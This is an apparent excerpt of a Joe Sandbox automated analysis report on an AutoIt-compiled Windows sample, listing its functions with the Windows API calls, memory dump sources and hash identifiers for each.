                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Variant$Clear$ChangeInitType_memmove
                                                    • String ID:
                                                    • API String ID: 1101466143-0
                                                    • Opcode ID: 610f1ab06b5ff77b4faa504dc7332d67857bd1a604f9ce9688df08cd741042c5
                                                    • Instruction ID: 53b7dce9081149aa75d52188695eee83c1d2753eb25e4c79a35abecd12cb45f0
                                                    • Opcode Fuzzy Hash: 610f1ab06b5ff77b4faa504dc7332d67857bd1a604f9ce9688df08cd741042c5
                                                    • Instruction Fuzzy Hash: 355178B5A00209EFCB10DF58C890AAAB7F9FF4D310B15856AE949DB301E331E911CFA0
                                                    Function 006B220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 006B2258
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006B22A3
                                                    • IsMenu.USER32(00000000), ref: 006B22C3
                                                    • CreatePopupMenu.USER32 ref: 006B22F7
                                                    • GetMenuItemCount.USER32(000000FF), ref: 006B2355
                                                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 006B2386
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                    • String ID:
                                                    • API String ID: 3311875123-0
                                                    • Opcode ID: 7ba29a9bc7c89a3182bb9cd861de1c47e66ccd1b73b8ad2e2b8800804a7129de
                                                    • Instruction ID: d0b82380aa4ed2aaefe954ccfeaab0a940e226a1bbbe0adda0edbb55cf935828
                                                    • Opcode Fuzzy Hash: 7ba29a9bc7c89a3182bb9cd861de1c47e66ccd1b73b8ad2e2b8800804a7129de
                                                    • Instruction Fuzzy Hash: 7251BEB0A0120BDBDF21CF68D8A8BEEBBF6BF45314F104129E811972A0D7748A85CB51
                                                    Function 00651765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00652612: GetWindowLongW.USER32(?,000000EB), ref: 00652623
                                                    • BeginPaint.USER32(?,?,?,?,?,?), ref: 0065179A
                                                    • GetWindowRect.USER32(?,?), ref: 006517FE
                                                    • ScreenToClient.USER32(?,?), ref: 0065181B
                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0065182C
                                                    • EndPaint.USER32(?,?), ref: 00651876
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                    • String ID:
                                                    • API String ID: 1827037458-0
                                                    • Opcode ID: 3f57780646d85db3c56c7ea6fdec82a0cca7faa521e4a979648472eac1e5471d
                                                    • Instruction ID: 895a4d6cba0360138b06e9c6533bef0f6159c4ec70692eb6b772c7a9c380c067
                                                    • Opcode Fuzzy Hash: 3f57780646d85db3c56c7ea6fdec82a0cca7faa521e4a979648472eac1e5471d
                                                    • Instruction Fuzzy Hash: ED41C370500700EFD720DF28CC84FBA7BEAEB4A725F044669F9A58B2E1C7319849DB61
                                                    Function 006C709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetForegroundWindow.USER32(?,?,?,?,?,?,006C4E41,?,?,00000000,00000001), ref: 006C70AC
                                                      • Part of subcall function 006C39A0: GetWindowRect.USER32(?,?), ref: 006C39B3
                                                    • GetDesktopWindow.USER32 ref: 006C70D6
                                                    • GetWindowRect.USER32(00000000), ref: 006C70DD
                                                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 006C710F
                                                      • Part of subcall function 006B5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006B52BC
                                                    • GetCursorPos.USER32(?), ref: 006C713B
                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 006C7199
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                    • String ID:
                                                    • API String ID: 4137160315-0
                                                    • Opcode ID: 03a4de96312b8960285b01848cfae8cd4840eeb440a4f6ab0a4038febfdf19fe
                                                    • Instruction ID: 80ef6221c0986206ee161cbb3e33365b9ef5310ab5e24560be31a8aa4a427ac6
                                                    • Opcode Fuzzy Hash: 03a4de96312b8960285b01848cfae8cd4840eeb440a4f6ab0a4038febfdf19fe
                                                    • Instruction Fuzzy Hash: 9331D272509305ABD720DF14D849FABB7EAFF88314F04091EF58597291CA30EA09CB92
                                                    Function 006A8879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 006A80A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 006A80C0
                                                      • Part of subcall function 006A80A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 006A80CA
                                                      • Part of subcall function 006A80A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 006A80D9
                                                      • Part of subcall function 006A80A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 006A80E0
                                                      • Part of subcall function 006A80A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 006A80F6
                                                    • GetLengthSid.ADVAPI32(?,00000000,006A842F), ref: 006A88CA
                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 006A88D6
                                                    • HeapAlloc.KERNEL32(00000000), ref: 006A88DD
                                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 006A88F6
                                                    • GetProcessHeap.KERNEL32(00000000,00000000,006A842F), ref: 006A890A
                                                    • HeapFree.KERNEL32(00000000), ref: 006A8911
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                    • String ID:
                                                    • API String ID: 3008561057-0
                                                    • Opcode ID: 778146b4a193360201ff197156515d859ac7b041259ea8c3cecdf716bb2e8b8a
                                                    • Instruction ID: 5f11e3a5fcb07e88e359579eaf678e7b66c90ab467ef29d111beb71c04c9768c
                                                    • Opcode Fuzzy Hash: 778146b4a193360201ff197156515d859ac7b041259ea8c3cecdf716bb2e8b8a
                                                    • Instruction Fuzzy Hash: 5B117F71902209FFDB10AFA8DC09BBF777AEB46315F148169E84697210CB369E45DB60
                                                    Function 006A85B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 006A85E2
                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 006A85E9
                                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 006A85F8
                                                    • CloseHandle.KERNEL32(00000004), ref: 006A8603
                                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 006A8632
                                                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 006A8646
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                    • String ID:
                                                    • API String ID: 1413079979-0
                                                    • Opcode ID: 4a856de2f7eeb5ff8a350e28cd9d2e18d11328696e23ee19f5470f0db0d4481a
                                                    • Instruction ID: 123b1d39662532105c283e5d4eaa762681f814f5d80e9e54b9ed0dd60ea60515
                                                    • Opcode Fuzzy Hash: 4a856de2f7eeb5ff8a350e28cd9d2e18d11328696e23ee19f5470f0db0d4481a
                                                    • Instruction Fuzzy Hash: 2C115C72901209AFDF01DFA4ED49FEE7BAAEF49304F045065FE05A2260C7719D61DB60
                                                    Function 006AB790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 006AB7B5
                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 006AB7C6
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 006AB7CD
                                                    • ReleaseDC.USER32(00000000,00000000), ref: 006AB7D5
                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 006AB7EC
                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 006AB7FE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: CapsDevice$Release
                                                    • String ID:
                                                    • API String ID: 1035833867-0
                                                    • Opcode ID: a9b39841ed43460b3c06f9205dfdaa0c0e593fa03b919660d1f11a6b536c23c3
                                                    • Instruction ID: 35d587813dc382ca54197078a5f88d64b1714c24ef8bcbd1911ed117d39202cf
                                                    • Opcode Fuzzy Hash: a9b39841ed43460b3c06f9205dfdaa0c0e593fa03b919660d1f11a6b536c23c3
                                                    • Instruction Fuzzy Hash: 96018475E01209BBEB10ABA69C45A5EBFB9EB49311F004076FA04A7291D671DD00CF90
                                                    Function 00670162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00670193
                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 0067019B
                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 006701A6
                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 006701B1
                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 006701B9
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 006701C1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Virtual
                                                    • String ID:
                                                    • API String ID: 4278518827-0
                                                    • Opcode ID: d96844e4dcb564708030834919a6fe736a1e2b18513b15f147b9cd3d656fb381
                                                    • Instruction ID: fd2c2dc1c633868f413f8aa23eea9c5f78792c13d348880b57776b812f992860
                                                    • Opcode Fuzzy Hash: d96844e4dcb564708030834919a6fe736a1e2b18513b15f147b9cd3d656fb381
                                                    • Instruction Fuzzy Hash: 97016CB09027597DE3008F5A8C85B52FFA8FF19354F00411BA15C47941C7F5A864CBE5
                                                    Function 006B53E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 006B53F9
                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 006B540F
                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 006B541E
                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006B542D
                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006B5437
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006B543E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                    • String ID:
                                                    • API String ID: 839392675-0
                                                    • Opcode ID: 68f3f1f55b0ba5d50a6c658edf55d5c771681bce7628858bb885307ec5e6b49a
                                                    • Instruction ID: 3f269445e64984ab9743707e1bb109d0c81219c25d55c89bc1d757d8a4503ccf
                                                    • Opcode Fuzzy Hash: 68f3f1f55b0ba5d50a6c658edf55d5c771681bce7628858bb885307ec5e6b49a
                                                    • Instruction Fuzzy Hash: 49F09032A42158BBE3205BA2DC0DEEF7B7DEFC6B11F00016AFA06D1050DBA05A0186B5
                                                    Function 006B7230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • InterlockedExchange.KERNEL32(?,?), ref: 006B7243
                                                    • EnterCriticalSection.KERNEL32(?,?,00660EE4,?,?), ref: 006B7254
                                                    • TerminateThread.KERNEL32(00000000,000001F6,?,00660EE4,?,?), ref: 006B7261
                                                    • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00660EE4,?,?), ref: 006B726E
                                                      • Part of subcall function 006B6C35: CloseHandle.KERNEL32(00000000,?,006B727B,?,00660EE4,?,?), ref: 006B6C3F
                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 006B7281
                                                    • LeaveCriticalSection.KERNEL32(?,?,00660EE4,?,?), ref: 006B7288
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                    • String ID:
                                                    • API String ID: 3495660284-0
                                                    • Opcode ID: 3dae515c30cae7894b88b18786bc8f54e4419de2b9ee1289e4ccfa817ad18e2a
                                                    • Instruction ID: 19a3d990dd0fde9ab983614f5d539cd2a13c2457116ad6f9cc0a61c8ffaa0f2a
                                                    • Opcode Fuzzy Hash: 3dae515c30cae7894b88b18786bc8f54e4419de2b9ee1289e4ccfa817ad18e2a
                                                    • Instruction Fuzzy Hash: 0DF08276D42612EBD7512BA4ED4CADB773BFF45702B101533F543910A0CB765A41CB90
                                                    Function 006A8992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 006A899D
                                                    • UnloadUserProfile.USERENV(?,?), ref: 006A89A9
                                                    • CloseHandle.KERNEL32(?), ref: 006A89B2
                                                    • CloseHandle.KERNEL32(?), ref: 006A89BA
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 006A89C3
                                                    • HeapFree.KERNEL32(00000000), ref: 006A89CA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                    • String ID:
                                                    • API String ID: 146765662-0
                                                    • Opcode ID: 06624d57115b1533a490801758b82e2a62128cd789339399435d1315c771d1d4
                                                    • Instruction ID: 7bf567777ef715ef3411931ef5103153011a2bc78ea4188118cb080025d1ed8a
                                                    • Opcode Fuzzy Hash: 06624d57115b1533a490801758b82e2a62128cd789339399435d1315c771d1d4
                                                    • Instruction Fuzzy Hash: A0E0E536905001FBDB012FE5EC0C95ABF7AFF89322B119232F21AC1170CB329420DB90
                                                    Function 006A7530 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,006E2C7C,?), ref: 006A76EA
                                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,006E2C7C,?), ref: 006A7702
                                                    • CLSIDFromProgID.OLE32(?,?,00000000,006DFB80,000000FF,?,00000000,00000800,00000000,?,006E2C7C,?), ref: 006A7727
                                                    • _memcmp.LIBCMT ref: 006A7748
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: FromProg$FreeTask_memcmp
                                                    • String ID: ,,n
                                                    • API String ID: 314563124-1563246951
                                                    • Opcode ID: d3ca5a81ae45c3d9c2ed8725e366284093a9845f76c0fb714b8016e3dd38b23e
                                                    • Instruction ID: 417dcb93781696575adc66c9d6079c3c605c16b2e7167ef643f383d7ba968538
                                                    • Opcode Fuzzy Hash: d3ca5a81ae45c3d9c2ed8725e366284093a9845f76c0fb714b8016e3dd38b23e
                                                    • Instruction Fuzzy Hash: C581EC75A00109EFCB04DFA4C984EEEB7BAFF89315F204559E516AB250DB71AE06CF60
                                                    Function 006C85ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 006C8613
                                                    • CharUpperBuffW.USER32(?,?), ref: 006C8722
                                                    • VariantClear.OLEAUT32(?), ref: 006C889A
                                                      • Part of subcall function 006B7562: VariantInit.OLEAUT32(00000000), ref: 006B75A2
                                                      • Part of subcall function 006B7562: VariantCopy.OLEAUT32(00000000,?), ref: 006B75AB
                                                      • Part of subcall function 006B7562: VariantClear.OLEAUT32(00000000), ref: 006B75B7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                    • API String ID: 4237274167-1221869570
                                                    • Opcode ID: f4e5c3e2a61e11050fb0c39a573773ffab375a34811b426d72fad90042124f42
                                                    • Instruction ID: a53007943e7cadbdeb6a30866a0a7b452a8b2e9cdb3491e6e55f937b75ceb13b
                                                    • Opcode Fuzzy Hash: f4e5c3e2a61e11050fb0c39a573773ffab375a34811b426d72fad90042124f42
                                                    • Instruction Fuzzy Hash: 55916C71604341DFC750DF24C484E6AB7E6EF89714F14896EF89A8B361DB31E905CB92
                                                    Function 006B2A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0066FC86: _wcscpy.LIBCMT ref: 0066FCA9
                                                    • _memset.LIBCMT ref: 006B2B87
                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 006B2BB6
                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 006B2C69
                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 006B2C97
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                    • String ID: 0
                                                    • API String ID: 4152858687-4108050209
                                                    • Opcode ID: ffb28cbdb38f431d6baaa305ea814cd54f4e3df607ac592859b70221949607c2
                                                    • Instruction ID: 386dbafd61cdba1f16441ec1540a44a37043e4f7582aaaebb3f2b43d2b099053
                                                    • Opcode Fuzzy Hash: ffb28cbdb38f431d6baaa305ea814cd54f4e3df607ac592859b70221949607c2
                                                    • Instruction Fuzzy Hash: 6851F0B15083029BD7A49F28C865AEF7BE6EF89310F044A2DF885D32D0DB70CD848796
                                                    Function 00663137 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 161COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: _memmove$_free
